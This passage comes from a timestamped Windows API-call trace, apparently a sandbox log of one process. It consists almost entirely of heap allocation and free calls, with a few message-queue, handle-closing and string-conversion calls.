(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.460] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.460] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.461] FreeLibrary (hLibModule=0x74d40000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.461] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.461] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.461] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0195.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0195.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0195.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.463] CloseHandle (hObject=0x1f8) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0195.464] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0195.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0195.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0195.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0195.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0195.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0195.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.465] CloseHandle (hObject=0x2ac) returned 1 [0195.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0195.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0195.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0195.475] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0195.479] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0195.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0195.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0195.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0195.480] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0195.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0195.480] HeapFree (in: 